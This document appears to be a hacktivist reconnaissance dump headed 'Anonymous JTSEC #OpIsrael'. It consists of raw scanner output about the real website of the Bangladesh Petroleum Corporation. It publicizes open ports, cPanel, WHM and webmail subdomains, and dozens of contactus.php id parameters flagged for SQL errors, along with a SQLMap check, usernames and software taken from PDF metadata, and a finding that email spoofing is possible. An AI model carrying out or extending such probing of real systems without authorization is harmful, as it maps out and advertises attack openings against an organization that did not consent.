Anonymous JTSEC #OpIsrael Full Recon #19

1. ######################################################################################################################################
2. Hostname www.bpc.gov.bd ISP TierPoint, LLC
3. Continent North America Flag
4. US
5. Country United States Country Code US
6. Region Unknown Local time 22 Nov 2018 11:03 CST
7. City Unknown Postal Code Unknown
8. IP Address 173.237.136.21 Latitude 37.751
9. Longitude -97.822
10.  
11. #######################################################################################################################################
12. > www.bpc.gov.bd
13. Server: 194.187.251.67
14. Address: 194.187.251.67#53
15.  
16. Non-authoritative answer:
17. www.bpc.gov.bd canonical name = bpc.gov.bd.
18. Name: bpc.gov.bd####
19. Address: 173.237.136.21
20. #######################################################################################################################################
21. HostIP:173.237.136.21
22. HostName:www.bpc.gov.bd
23.  
24. Gathered Inet-whois information for 173.237.136.21
25. --------------------------------------------------------------------------------------------------------------------------------------
26.  
27.  
28. inetnum: 173.234.136.0 - 173.244.143.255
29. netname: NON-RIPE-NCC-MANAGED-ADDRESS-BLOCK
30. descr: IPv4 address block not managed by the RIPE NCC
31. remarks: ------------------------------------------------------
32. remarks:
33. remarks: You can find the whois server to query, or the
34. remarks: IANA registry to query on this web page:
35. remarks: http://www.iana.org/assignments/ipv4-address-space
36. remarks:
37. remarks: You can access databases of other RIRs at:
38. remarks:
39. remarks: AFRINIC (Africa)
40. remarks: http://www.afrinic.net/ whois.afrinic.net
41. remarks:
42. remarks: APNIC (Asia Pacific)
43. remarks: http://www.apnic.net/ whois.apnic.net
44. remarks:
45. remarks: ARIN (Northern America)
46. remarks: http://www.arin.net/ whois.arin.net
47. remarks:
48. remarks: LACNIC (Latin America and the Carribean)
49. remarks: http://www.lacnic.net/ whois.lacnic.net
50. remarks:
51. remarks: IANA IPV4 Recovered Address Space
52. remarks: http://www.iana.org/assignments/ipv4-recovered-address-space/ipv4-recovered-address-space.xhtml
53. remarks:
54. remarks: ------------------------------------------------------
55. country: EU # Country is really world wide
56. admin-c: IANA1-RIPE
57. tech-c: IANA1-RIPE
58. status: ALLOCATED UNSPECIFIED
59. mnt-by: RIPE-NCC-HM-MNT
60. mnt-lower: RIPE-NCC-HM-MNT
61. created: 2018-07-09T15:19:05Z
62. last-modified: 2018-09-04T13:35:20Z
63. source: RIPE
64.  
65. role: Internet Assigned Numbers Authority
66. address: see http://www.iana.org.
67. admin-c: IANA1-RIPE
68. tech-c: IANA1-RIPE
69. nic-hdl: IANA1-RIPE
70. remarks: For more information on IANA services
71. remarks: go to IANA web site at http://www.iana.org.
72. mnt-by: RIPE-NCC-MNT
73. created: 1970-01-01T00:00:00Z
74. last-modified: 2001-09-22T09:31:27Z
75. source: RIPE # Filtered
76.  
77. % This query was served by the RIPE Database Query Service version 1.92.6 (WAGYU)
78.  
79.  
80.  
81. Gathered Inic-whois information for bpc.gov.bd
82. --------------------------------------------------------------------------------------------------------------------------------------
83. Error: Unable to connect - Invalid Host
84. ERROR: Connection to InicWhois Server bd.whois-servers.net failed
85. close error
86.  
87. Gathered Netcraft information for www.bpc.gov.bd
88. --------------------------------------------------------------------------------------------------------------------------------------
89.  
90. Retrieving Netcraft.com information for www.bpc.gov.bd
91. Netcraft.com Information gathered
92.  
93. Gathered Subdomain information for bpc.gov.bd
94. -------------------------------------------------------------------------------------------------------------------------------------
95. Searching Google.com:80...
96. HostName:www.bpc.gov.bd
97. HostIP:173.237.136.21
98. Searching Altavista.com:80...
99. Found 1 possible subdomain(s) for host bpc.gov.bd, Searched 0 pages containing 0 results
100.  
101. Gathered E-Mail information for bpc.gov.bd
102. -----------------------------------------------------------------------------------------------------------------------------------
103. Searching Google.com:80...
104. Searching Altavista.com:80...
105. Found 0 E-Mail(s) for host bpc.gov.bd, Searched 0 pages containing 0 results
106.  
107. Gathered TCP Port information for 173.237.136.21
108. --------------------------------------------------------------------------------------------------------------------------------------
109.  
110. Port State
111.  
112. 21/tcp open
113. 22/tcp open
114. 26/tcp open
115. 53/tcp open
116. 80/tcp open
117. 110/tcp open
118. 143/tcp open
119.  
120. Portscan Finished: Scanned 150 ports, 141 ports were in state closed
121.  
122. #######################################################################################################################################
123. [i] Scanning Site: http://www.bpc.gov.bd
124.  
125.  
126.  
127. B A S I C I N F O
128. =======================================================================================================================================
129.  
130.  
131. [+] Site Title: Bangladesh Petroleum Corporation
132. [+] IP address: 173.237.136.21
133. [+] Web Server: Could Not Detect
134. [+] CMS: Could Not Detect
135. [+] Cloudflare: Not Detected
136. [+] Robots File: Could NOT Find robots.txt!
137.  
138.  
139.  
140.  
141.  
142.  
143. G E O I P L O O K U P
144. =======================================================================================================================================
145.  
146. [i] IP Address: 173.237.136.21
147. [i] Country: US
148. [i] State: Missouri
149. [i] City: Saint Louis
150. [i] Latitude: 38.614300
151. [i] Longitude: -90.444397
152.  
153.  
154.  
155.  
156. H T T P H E A D E R S
157. =======================================================================================================================================
158.  
159.  
160. [i] HTTP/1.1 200 OK
161. [i] Date: Thu, 22 Nov 2018 17:10:26 GMT
162. [i] Content-Type: text/html; charset=UTF-8
163. [i] Connection: close
164.  
165.  
166.  
167.  
168. D N S L O O K U P
169. =======================================================================================================================================
170.  
171. bpc.gov.bd. 21599 IN SOA ns1.speedydns.net. root.uscentral22.myserverhosts.com. 2018070501 86400 7200 3600000 86400
172. bpc.gov.bd. 21599 IN A 173.237.136.21
173. bpc.gov.bd. 21599 IN MX 0 bpc.gov.bd.
174. bpc.gov.bd. 21599 IN NS ns1.speedydns.net.
175. bpc.gov.bd. 21599 IN NS ns2.speedydns.net.
176.  
177.  
178.  
179.  
180. S U B N E T C A L C U L A T I O N
181. ======================================================================================================================================
182.  
183. Address = 173.237.136.21
184. Network = 173.237.136.21 / 32
185. Netmask = 255.255.255.255
186. Broadcast = not needed on Point-to-Point links
187. Wildcard Mask = 0.0.0.0
188. Hosts Bits = 0
189. Max. Hosts = 1 (2^0 - 0)
190. Host Range = { 173.237.136.21 - 173.237.136.21 }
191.  
192.  
193.  
194. N M A P P O R T S C A N
195. ======================================================================================================================================
196.  
197.  
198. Starting Nmap 7.40 ( https://nmap.org ) at 2018-11-22 17:10 UTC
199. Nmap scan report for bpc.gov.bd (173.237.136.21)
200. Host is up (0.038s latency).
201. rDNS record for 173.237.136.21: uscentral22.myserverhosts.com
202. PORT STATE SERVICE
203. 21/tcp open ftp
204. 22/tcp open ssh
205. 23/tcp filtered telnet
206. 80/tcp open http
207. 110/tcp open pop3
208. 143/tcp open imap
209. 443/tcp open https
210. 3389/tcp closed ms-wbt-server
211.  
212. Nmap done: 1 IP address (1 host up) scanned in 2.95 seconds
213.  
214.  
215.  
216.  
217.  
218.  
219. S Q L V U L N E R A B I L I T Y S C A N N E R
220. =======================================================================================================================================
221.  
222. [#] contactus.php?id=32
223. [-] Searching For SQL Errors: Found!
224.  
225.  
226. [#] contactus.php?id=1
227. [-] Searching For SQL Errors: Found!
228.  
229.  
230. [#] contactus.php?id=3
231. [-] Searching For SQL Errors: Found!
232.  
233.  
234. [#] contactus.php?id=5
235. [-] Searching For SQL Errors: Found!
236.  
237.  
238. [#] contactus.php?id=6
239. [-] Searching For SQL Errors: Found!
240.  
241.  
242. [#] contactus.php?id=7
243. [-] Searching For SQL Errors: Found!
244.  
245.  
246. [#] contactus.php?id=8
247. [-] Searching For SQL Errors: Found!
248.  
249.  
250. [#] contactus.php?id=14
251. [-] Searching For SQL Errors: Found!
252.  
253.  
254. [#] contactus.php?id=23
255. [-] Searching For SQL Errors: Found!
256.  
257.  
258. [#] contactus.php?id=32
259. [-] Searching For SQL Errors: Found!
260.  
261.  
262. [#] contactus.php?id=40
263. [-] Searching For SQL Errors: Found!
264.  
265.  
266. [#] contactus.php?id=4
267. [-] Searching For SQL Errors: Found!
268.  
269.  
270. [#] contactus.php?id=35
271. [-] Searching For SQL Errors: Found!
272.  
273.  
274. [#] contactus.php?id=17
275. [-] Searching For SQL Errors: Found!
276.  
277.  
278. [#] contactus.php?id=18
279. [-] Searching For SQL Errors: Found!
280.  
281.  
282. [#] contactus.php?id=19
283. [-] Searching For SQL Errors: Found!
284.  
285.  
286. [#] contactus.php?id=20
287. [-] Searching For SQL Errors: Found!
288.  
289.  
290. [#] contactus.php?id=21
291. [-] Searching For SQL Errors: Found!
292.  
293.  
294. [#] contactus.php?id=36
295. [-] Searching For SQL Errors: Found!
296.  
297.  
298. [#] contactus.php?id=37
299. [-] Searching For SQL Errors: Found!
300.  
301.  
302. [#] contactus.php?id=52
303. [-] Searching For SQL Errors: Found!
304.  
305.  
306. [#] contactus.php?id=45
307. [-] Searching For SQL Errors: Found!
308.  
309.  
310. [#] contactus.php?id=46
311. [-] Searching For SQL Errors: Found!
312.  
313.  
314. [#] contactus.php?id=47
315. [-] Searching For SQL Errors: Found!
316.  
317.  
318. [#] contactus.php?id=48
319. [-] Searching For SQL Errors: Found!
320.  
321.  
322. [#] contactus.php?id=49
323. [-] Searching For SQL Errors: Found!
324.  
325.  
326. [#] contactus.php?id=2
327. [-] Searching For SQL Errors: Found!
328.  
329.  
330. [#] contactus.php?id=12
331. [-] Searching For SQL Errors: Found!
332.  
333.  
334. [#] contactus.php?id=22
335. [-] Searching For SQL Errors: Found!
336.  
337.  
338. [#] contactus.php?id=27
339. [-] Searching For SQL Errors: Found!
340.  
341.  
342. [#] contactus.php?id=28
343. [-] Searching For SQL Errors: Found!
344.  
345.  
346. [#] contactus.php?id=29
347. [-] Searching For SQL Errors: Found!
348.  
349.  
350. [#] contactus.php?id=39
351. [-] Searching For SQL Errors: Found!
352.  
353.  
354. [#] contactus.php?id=41
355. [-] Searching For SQL Errors: Found!
356.  
357.  
358. [#] contactus.php?id=13
359. [-] Searching For SQL Errors: Found!
360.  
361.  
362. [#] contactus.php?id=26
363. [-] Searching For SQL Errors: Found!
364.  
365.  
366. [#] contactus.php?id=18
367. [-] Searching For SQL Errors: Found!
368.  
369.  
370. [#] contactus.php?id=36
371. [-] Searching For SQL Errors: Found!
372.  
373.  
374. [#] contactus.php?id=37
375. [-] Searching For SQL Errors: Found!
376. #######################################################################################################################################
377. [?] Enter the target: http://www.bpc.gov.bd/
378. [!] IP Address : 173.237.136.21
379. [!] www.bpc.gov.bd doesn't seem to use a CMS
380. [+] Honeypot Probabilty: 30%
381. ---------------------------------------------------------------------------------------------------------------------------------------
382. [~] Trying to gather whois information for www.bpc.gov.bd
383. [+] Whois information found
384. [-] Unable to build response, visit https://who.is/whois/www.bpc.gov.bd
385. -------------------------------------------------------------------------------------------------------------------------------------
386. PORT STATE SERVICE
387. 21/tcp open ftp
388. 22/tcp open ssh
389. 23/tcp filtered telnet
390. 80/tcp open http
391. 110/tcp open pop3
392. 143/tcp open imap
393. 443/tcp open https
394. 3389/tcp closed ms-wbt-server
395. Nmap done: 1 IP address (1 host up) scanned in 1.25 seconds
396. --------------------------------------------------------------------------------------------------------------------------------------
397.  
398. [+] DNS Records
399. ns1.speedydns.net. (174.37.183.108) AS36351 SoftLayer Technologies Inc. United States
400. ns2.speedydns.net. (50.22.35.226) AS36351 SoftLayer Technologies Inc. United States
401.  
402. [+] MX Records
403. 0 (173.237.136.21) AS36024 Colo4, LLC United States
404.  
405. [+] Host Records (A)
406. www.bpc.gov.bdHTTP: (uscentral22.myserverhosts.com) (173.237.136.21) AS36024 Colo4, LLC United States
407.  
408. [+] TXT Records
409.  
410. [+] DNS Map: https://dnsdumpster.com/static/map/bpc.gov.bd.png
411.  
412. [>] Initiating 3 intel modules
413. [>] Loading Alpha module (1/3)
414. [>] Beta module deployed (2/3)
415. [>] Gamma module initiated (3/3)
416.  
417.  
418. [+] Emails found:
419. -------------------------------------------------------------------------------------------------------------------------------------
420. pixel-1542906651361929-web-@www.bpc.gov.bd
421. pixel-1542906653819235-web-@www.bpc.gov.bd
422. No hosts found
423. [+] Virtual hosts:
424. --------------------------------------------------------------------------------------------------------------------------------------
425. [~] Crawling the target for fuzzable URLs
426. [+] Found 39 fuzzable URLs
427. http://www.bpc.gov.bd//contactus.php?id=32
428. [~] Using SQLMap api to check for SQL injection vulnerabilities. Don't worry we are using an online service and it doesn't depend on your internet connection. This scan will take 2-3 minutes.
429. #######################################################################################################################################
430. [+] Hosting Info for Website: www.bpc.gov.bd
431. [+] Visitors per day: 2,360
432. [+] IP Address: 173.237.136.21
433. [+] IP Reverse DNS (Host): uscentral22.myserverhosts.com
434. [+] Hosting IP Range: 173.237.128.0 - 173.237.191.255 (16,384 ip)
435. [+] Hosting Address: 12444 Powerscourt Drive Suite 450, St. Louis, MO, 63131, US
436. [+] Hosting Country: USA
437. [+] Hosting Phone: +1-484-893-1507, +1-609-220-0322, +1-610-994-3046
438. [+] Hosting Website: api.jumis.com
439. [+] CIDR: 173.237.128.0/18
440. [+] Hosting CIDR: 173.237.128.0/18
441.  
442. [+] NS: bpc.gov.bd
443. [+] NS: ns2.speedydns.net
444. [+] NS: ns1.speedydns.net
445. ######################################################################################################################################
446. ; <<>> DiG 9.11.5-1-Debian <<>> bpc.gov.bd
447. ;; global options: +cmd
448. ;; Got answer:
449. ;; ->>HEADER<<- opcode: QUERY, status: NOERROR, id: 36802
450. ;; flags: qr rd ra; QUERY: 1, ANSWER: 1, AUTHORITY: 0, ADDITIONAL: 1
451.  
452. ;; OPT PSEUDOSECTION:
453. ; EDNS: version: 0, flags:; udp: 4096
454. ;; QUESTION SECTION:
455. ;bpc.gov.bd. IN A
456.  
457. ;; ANSWER SECTION:
458. bpc.gov.bd. 84833 IN A 173.237.136.21
459.  
460. ;; Query time: 120 msec
461. ;; SERVER: 194.187.251.67#53(194.187.251.67)
462. ;; WHEN: jeu nov 22 12:29:33 EST 2018
463. ;; MSG SIZE rcvd: 55
464.  
465. #####################################################################################################################################
466. ; <<>> DiG 9.11.5-1-Debian <<>> +trace bpc.gov.bd
467. ;; global options: +cmd
468. . 86160 IN NS h.root-servers.net.
469. . 86160 IN NS c.root-servers.net.
470. . 86160 IN NS l.root-servers.net.
471. . 86160 IN NS g.root-servers.net.
472. . 86160 IN NS m.root-servers.net.
473. . 86160 IN NS b.root-servers.net.
474. . 86160 IN NS e.root-servers.net.
475. . 86160 IN NS i.root-servers.net.
476. . 86160 IN NS k.root-servers.net.
477. . 86160 IN NS a.root-servers.net.
478. . 86160 IN NS d.root-servers.net.
479. . 86160 IN NS f.root-servers.net.
480. . 86160 IN NS j.root-servers.net.
481. . 86160 IN RRSIG NS 8 0 518400 20181205050000 20181122040000 2134 . GbKyyBgbCU9fsYw/7uunYdGXnGc/GkWD7cWhP2+DSip0Tz3Vy+JJ79NZ ml0SGP0/S4GlCXVm11FpcXQOPTpoJZdtJqb/403hlOwB5q9CEooFek5d cWhmFYrkAML8E48uU1+ji72NRCdzs9saOPGk/FRlc4dTQwVNI97qqJMT GnHK9wqugnfiV4jFnAX/UmikW1tOdRyeTaqB5voY1Tku7x8XvLsu/5VL 4SOobgjvdbaLTgJqZTjLq0Q1fNMztDU3cr3I1NNWkcKSUOiAJ8tThR4s almON2rxSXGYyhwlbLezIsBj3RDEfYuc6V2TRRuSbv/fGE75rZBFYyc4 wZWwyw==
482. ;; Received 525 bytes from 194.187.251.67#53(194.187.251.67) in 120 ms
483.  
484. bd. 172800 IN NS jamuna.btcl.net.bd.
485. bd. 172800 IN NS dns.bd.
486. bd. 172800 IN NS surma.btcl.net.bd.
487. bd. 172800 IN NS bd-ns.anycast.pch.net.
488. bd. 86400 IN NSEC be. NS RRSIG NSEC
489. bd. 86400 IN RRSIG NSEC 8 1 86400 20181205050000 20181122040000 2134 . Cee16WQpXm9zmIh4pKmOHxD7UY+0gLgYXlQx87XivrpYpTRMb3xaKc8A 98iY4jtO5j30dyLZkpR8loCWgw6un4F8MhfZLloTARKxc+EU19tUcEWO N/qgTta/lsOjDPG12VQByhlKXsPaKWDfK6zUMQbiEr+ivZxhp/gv98vJ z+F5z9+WIm6ss9x45a6XDOj9eIndlyNSkiBUcII3YsK65do3dLw1oW4v WvrkOBD5cRcyUSOUm1JNSdAdrAfCCv6A4Ovd8D151QfEzrieGXyaNHJT zM5lGpqnaV6S1xaqwv/rW8n+RJCyBb1MAxjqh9btPjRPZt+bHBjuR6mG naBlrA==
490. ;; Received 657 bytes from 199.9.14.201#53(b.root-servers.net) in 280 ms
491.  
492. bpc.gov.bd. 86400 IN NS ns2.speedydns.net.
493. bpc.gov.bd. 86400 IN NS ns1.speedydns.net.
494. ;; Received 88 bytes from 204.61.216.108#53(bd-ns.anycast.pch.net) in 117 ms
495.  
496. ;; expected opt record in response
497. bpc.gov.bd. 86400 IN A 173.237.136.21
498. bpc.gov.bd. 86400 IN NS ns1.speedydns.net.
499. bpc.gov.bd. 86400 IN NS ns2.speedydns.net.
500. ;; Received 125 bytes from 174.37.183.108#53(ns1.speedydns.net) in 247 ms
501.  
502. ######################################################################################################################################
503. [*] Performing General Enumeration of Domain: bpc.gov.bd
504. [-] DNSSEC is not configured for bpc.gov.bd
505. [*] SOA ns1.speedydns.net 174.37.183.108
506. [*] NS ns2.speedydns.net 50.22.35.226
507. [*] NS ns1.speedydns.net 174.37.183.108
508. [*] MX bpc.gov.bd 173.237.136.21
509. [*] A bpc.gov.bd 173.237.136.21
510. [*] Enumerating SRV Records
511. [-] No SRV Records Found for bpc.gov.bd
512. [+] 0 Records Found
513. ######################################################################################################################################
514. [*] Processing domain bpc.gov.bd
515. [+] Getting nameservers
516. 50.22.35.226 - ns2.speedydns.net
517. 174.37.183.108 - ns1.speedydns.net
518. [-] Zone transfer failed
519.  
520. [+] MX records found, added to target list
521. 0 bpc.gov.bd.
522.  
523. [*] Scanning bpc.gov.bd for A records
524. 173.237.136.21 - bpc.gov.bd
525. 173.237.136.21 - autodiscover.bpc.gov.bd
526. 173.237.136.21 - autoconfig.bpc.gov.bd
527. 173.237.136.21 - cpanel.bpc.gov.bd
528. 173.237.136.21 - ftp.bpc.gov.bd
529. 127.0.0.1 - localhost.bpc.gov.bd
530. 173.237.136.21 - mail.bpc.gov.bd
531. 173.237.136.21 - webdisk.bpc.gov.bd
532. 173.237.136.21 - webmail.bpc.gov.bd
533. 173.237.136.21 - whm.bpc.gov.bd
534. 173.237.136.21 - www.bpc.gov.bd
535. #######################################################################################################################################
536. Ip Address Status Type Domain Name Server
537. ---------- ------ ---- ----------- ------
538. 173.237.136.21 200 host ftp.bpc.gov.bd
539. 127.0.0.1 host localhost.bpc.gov.bd
540. 173.237.136.21 200 alias mail.bpc.gov.bd
541. 173.237.136.21 200 host bpc.gov.bd
542. 173.237.136.21 301 host webmail.bpc.gov.bd
543. 173.237.136.21 200 alias www.bpc.gov.bd
544. 173.237.136.21 200 host bpc.gov.bd
545. ######################################################################################################################################
546. [+] Testing domain
547. www.bpc.gov.bd 173.237.136.21
548. [+] Dns resolving
549. Domain name Ip address Name server
550. bpc.gov.bd 173.237.136.21 uscentral22.myserverhosts.com
551. Found 1 host(s) for bpc.gov.bd
552. [+] Testing wildcard
553. Ok, no wildcard found.
554.  
555. [+] Scanning for subdomain on bpc.gov.bd
556. [!] Wordlist not specified. I scannig with my internal wordlist...
557. Estimated time about 127.6 seconds
558.  
559. Subdomain Ip address Name server
560.  
561. ftp.bpc.gov.bd 173.237.136.21 uscentral22.myserverhosts.com
562. localhost.bpc.gov.bd 127.0.0.1 localhost
563. mail.bpc.gov.bd 173.237.136.21 uscentral22.myserverhosts.com
564. webmail.bpc.gov.bd 173.237.136.21 uscentral22.myserverhosts.com
565. www.bpc.gov.bd 173.237.136.21 uscentral22.myserverhosts.com
566. #######################################################################################################################################
567. Start: 2018-11-22T17:28:48+0000
568. HOST: web01 Loss% Snt Last Avg Best Wrst StDev
569. 1.|-- 45.79.12.202 0.0% 3 1.1 0.8 0.7 1.1 0.2
570. 2.|-- 45.79.12.6 0.0% 3 1.0 3.6 0.7 9.2 4.8
571. 3.|-- dls-b22-link.telia.net 0.0% 3 0.9 1.0 0.9 1.3 0.2
572. 4.|-- dls-b21-link.telia.net 0.0% 3 1.4 3.4 1.4 6.3 2.6
573. 5.|-- tierpoint-ic-310923-dls-b21.c.telia.net 0.0% 3 1.4 5.8 1.4 14.4 7.4
574. 6.|-- 207.210.229.6 0.0% 3 1.7 1.7 1.7 1.8 0.0
575. 7.|-- 174.136.31.218 0.0% 3 1.3 1.4 1.3 1.4 0.1
576. 8.|-- uscentral22.myserverhosts.com 0.0% 3 1.4 1.6 1.4 1.8 0.2
577. #######################################################################################################################################
578. ---------------------------------------------------------------------------------------------------------------------------------------
579. + Target IP: 173.237.136.21
580. + Target Hostname: www.bpc.gov.bd
581. + Target Port: 80
582. + Start Time: 2018-11-22 12:08:57 (GMT-5)
583. ---------------------------------------------------------------------------------------------------------------------------------------
584. + Server: No banner retrieved
585. + The anti-clickjacking X-Frame-Options header is not present.
586. + The X-XSS-Protection header is not defined. This header can hint to the user agent to protect against some forms of XSS
587. + The X-Content-Type-Options header is not set. This could allow the user agent to render the content of the site in a different fashion to the MIME type
588. + Uncommon header 'x-squid-error' found, with contents: ERR_INVALID_URL 0
589. + ERROR: Error limit (20) reached for host, giving up. Last error: error reading HTTP response
590. + Scan terminated: 13 error(s) and 4 item(s) reported on remote host
591. + End Time: 2018-11-22 13:05:53 (GMT-5) (3416 seconds)
592. ---------------------------------------------------------------------------------------------------------------------------------------
593. ######################################################################################################################################
594.  
595. dnsenum VERSION:1.2.4
596.  
597. ----- www.bpc.gov.bd -----
598.  
599.  
600. Host's addresses:
601. __________________
602.  
603. bpc.gov.bd. 86400 IN A 173.237.136.21
604.  
605.  
606. Name Servers:
607. ______________
608.  
609. ns2.speedydns.net. 86081 IN A 50.22.35.226
610. ns1.speedydns.net. 86065 IN A 174.37.183.108
611.  
612.  
613. Mail (MX) Servers:
614. ___________________
615.  
616. bpc.gov.bd. 86400 IN A 173.237.136.21
617.  
618.  
619. Trying Zone Transfers and getting Bind Versions:
620. _________________________________________________
621.  
622.  
623. Trying Zone Transfer for www.bpc.gov.bd on ns2.speedydns.net ...
624.  
625. Trying Zone Transfer for www.bpc.gov.bd on ns1.speedydns.net ...
626.  
627. brute force file not specified, bay.
628. #######################################################################################################################################
629. ---------------------------------------------------------------------------------------------------------------------------------------
630.  
631. [1/25] /webhp?hl=en-FR
632. [x] Error downloading /webhp?hl=en-FR
633. [2/25] http://www.bpc.gov.bd/admin/current_vacancies/b684c889e14c1df86dd830a9fd904cdd.pdf
634. [x] Error in PDF metadata Creator
635. [3/25] http://www.bpc.gov.bd/admin/notice/12fd8e6bc2cf87cca46f19a3e7b9a611.pdf
636. [x] Error in the parsing process
637. [4/25] http://www.bpc.gov.bd/admin/news/c1b73506b57f8ebf2928f704827dd5c1.pdf
638. [5/25] http://www.bpc.gov.bd/admin/news/0f0d9138a5e0898c496fa98006f712d6.pdf
639. [6/25] http://www.bpc.gov.bd/admin/news/685281be8984823884192e42eea1d05b.pdf
640. [7/25] http://www.bpc.gov.bd/admin/news/f952301b036b57834b7ee3a2de020472.pdf
641. [8/25] http://www.bpc.gov.bd/admin/annual_report/5878e46e61726e85a43b91e477ebeadf.pdf
642. [x] Error in PDF metadata Creator
643. [9/25] http://www.bpc.gov.bd/admin/annual_report/50f12271ac13cec7515303ea83553f03.pdf
644. [x] Error in PDF metadata Creator
645. [10/25] http://www.bpc.gov.bd/admin/annual_report/a70881d948e78e700e8581525b36c72e.pdf
646. [x] Error in PDF metadata Creator
647. [11/25] http://www.bpc.gov.bd/admin/notice/4eabe0863aa66c8b75c50512ce82e19f.pdf
648. [x] Error in PDF metadata Creator
649. [12/25] http://www.bpc.gov.bd/admin/news/d455f1c285096b6258557e06533c075c.pdf
650. [13/25] https://www.bpc.gov.bd/admin/annual_performance_agreement/5ee366afaf58b1fefc13bb66c661f311.pdf
651. [x] Error downloading https://www.bpc.gov.bd/admin/annual_performance_agreement/5ee366afaf58b1fefc13bb66c661f311.pdf
652. [14/25] http://www.bpc.gov.bd/admin/notice/dc7b13b25ad04c58c5f8c9ee7b636ce2.pdf
653. [x] Error in the parsing process
654. [15/25] http://www.bpc.gov.bd/admin/annual_performance_agreement/890199e67b62b98b41ec178498f3fc50.pdf
655. [x] Error in PDF metadata Creator
656. [16/25] http://www.bpc.gov.bd/admin/notice/1e0e387a348b442c5b7526aabdd7ce81.pdf
657. [x] Error in the parsing process
658. [17/25] http://www.bpc.gov.bd/admin/notice/dbef95d4ba79e5a67d69995e72d5a3ff.pdf
659. [x] Error in the parsing process
660. [18/25] http://www.bpc.gov.bd/admin/news/b7807166e10bff066ade14a348b34eb8.pdf
661. [19/25] http://www.bpc.gov.bd/admin/notice/28ee5a0e6338c34c25fcd818bec1895b.pdf
662. [x] Error in the parsing process
663. [20/25] http://www.bpc.gov.bd/admin/news/8d3e9ece7700392e11a588c85d14fd46.pdf
664. [21/25] http://www.bpc.gov.bd/admin/notice/553a692d84b865b3f8d6c87a7579dc8f.pdf
665. [x] Error in the parsing process
666. [22/25] http://www.bpc.gov.bd/admin/notice/383e04897c6786078e0d34677956f3e0.pdf
667. [x] Error in the parsing process
668. [23/25] http://www.bpc.gov.bd/admin/vacancy/7cff6f9ef50bc77b13a761d6c642c5ba.pdf
669. [24/25] http://www.bpc.gov.bd/admin/annual_performance_agreement/f05a92ce7e1091227bd945ff36175103.pdf
670. [x] Error in PDF metadata Creator
671. [25/25] http://www.bpc.gov.bd/admin/current_vacancies/99abe678b4ebe6abddbdb7f9fb75fe4a.pdf
672. ######################################################################################################################################
673. [+] List of users found:
674. ---------------------------------------------------------------------------------------------------------------------------------------
675.  
676. ��USER
677. DELL
678.  
679. [+] List of software found:
680. -----------------------------
681.  
682. GPL Ghostscript 9.14
683. PDF24 Creator
684. IJ Scan Utility
685. Canon SC1011
686. Adobe PDF Library 5.0.5
687. HP PDF Formatter version 7.0.0.175
688. ��DPE Build 5656
689. GPL Ghostscript 9.22
690. PDF Splitter and Merger (http://www.pdfarea.com)
691.  
692. [+] List of e-mails found:
693. ----------------------------
694. cl@Ifr
695. f@a
696. rqtfterstg@sqm
697. .r@r
698. ######################################################################################################################################
699.  
700.  
701. Running Source: Ask
702. Running Source: Archive.is
703. Running Source: Baidu
704. Running Source: Bing
705. Running Source: CertDB
706. Running Source: CertificateTransparency
707. Running Source: Certspotter
708. Running Source: Commoncrawl
709. Running Source: Crt.sh
710. Running Source: Dnsdb
711. Running Source: DNSDumpster
712. Running Source: DNSTable
713. Running Source: Dogpile
714. Running Source: Exalead
715. Running Source: Findsubdomains
716. Running Source: Googleter
717. Running Source: Hackertarget
718. Running Source: Ipv4Info
719. Running Source: PTRArchive
720. Running Source: Sitedossier
721. Running Source: Threatcrowd
722. Running Source: ThreatMiner
723. Running Source: WaybackArchive
724. Running Source: Yahoo
725.  
726. Running enumeration on www.bpc.gov.bd
727.  
728. dnsdb: Unexpected return status 503
729.  
730. waybackarchive: Get https://web.archive.org/cdx/search/cdx?url=*.www.bpc.gov.bd/*&output=json&fl=original&collapse=urlkey&page=: net/http: invalid header field value "http://web.archive.org/cdx/search/cdx?url=*.www.bpc.gov.bd/*&output=json&fl=original&collapse=urlkey&page=\x00" for key Referer
731.  
732.  
733. Starting Bruteforcing of www.bpc.gov.bd with 9985 words
734.  
735. Total 1 Unique subdomains found for www.bpc.gov.bd
736.  
737. .www.bpc.gov.bd
738. #######################################################################################################################################
739. [+] www.bpc.gov.bd has no SPF record!
740. [*] No DMARC record found. Looking for organizational record
741. [+] No organizational DMARC record
742. [+] Spoofing possible for www.bpc.gov.bd!
743. #######################################################################################################################################
744. __
745. ____ _____ ___ ______ _/ /_____ ____ ___
746. / __ `/ __ `/ / / / __ `/ __/ __ \/ __ \/ _ \
747. / /_/ / /_/ / /_/ / /_/ / /_/ /_/ / / / / __/
748. \__,_/\__, /\__,_/\__,_/\__/\____/_/ /_/\___/
749. /_/ discover v0.5.0 - by @michenriksen
750.  
751. Identifying nameservers for www.bpc.gov.bd... Done
752. Using nameservers:
753.  
754. - 50.22.35.226
755. - 174.37.183.108
756.  
757. Checking for wildcard DNS... Done
758.  
759. Running collector: Threat Crowd... Done (0 hosts)
760. Running collector: DNSDB... Error
761. -> DNSDB returned unexpected response code: 503
762. Running collector: Netcraft... Done (0 hosts)
763. Running collector: PublicWWW... Done (0 hosts)
764. Running collector: Censys... Skipped
765. -> Key 'censys_secret' has not been set
766. Running collector: Wayback Machine... Done (5 hosts)
767. Running collector: PTRArchive... Error
768. -> PTRArchive returned unexpected response code: 502
769. Running collector: PassiveTotal... Skipped
770. -> Key 'passivetotal_key' has not been set
771. Running collector: Shodan... Skipped
772. -> Key 'shodan' has not been set
773. Running collector: Riddler... Skipped
774. -> Key 'riddler_username' has not been set
775. Running collector: VirusTotal... Skipped
776. -> Key 'virustotal' has not been set
777. Running collector: Dictionary... Done (0 hosts)
778. Running collector: HackerTarget... Done (1 host)
779. Running collector: Google Transparency Report... Done (0 hosts)
780. Running collector: Certificate Search... Done (0 hosts)
781.  
782. Resolving 5 unique hosts...
783. 173.237.136.21 bpc.gov.bd
784. 173.237.136.21 cpanel.bpc.gov.bd
785. 173.237.136.21 mail.bpc.gov.bd
786. 173.237.136.21 webmail.bpc.gov.bd
787. 173.237.136.21 www.bpc.gov.bd
788.  
789. Found subnets:
790.  
791. - 173.237.136.0-255 : 5 hosts
792.  
793. Wrote 5 hosts to:
794.  
795. - file:///root/aquatone/www.bpc.gov.bd/hosts.txt
796. - file:///root/aquatone/www.bpc.gov.bd/hosts.json
797. __
798. ____ _____ ___ ______ _/ /_____ ____ ___
799. / __ `/ __ `/ / / / __ `/ __/ __ \/ __ \/ _ \
800. / /_/ / /_/ / /_/ / /_/ / /_/ /_/ / / / / __/
801. \__,_/\__, /\__,_/\__,_/\__/\____/_/ /_/\___/
802. /_/ takeover v0.5.0 - by @michenriksen
803.  
